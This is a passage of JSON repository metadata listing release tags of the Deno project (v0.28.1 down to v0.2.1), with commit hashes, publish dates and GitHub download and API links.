mmit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://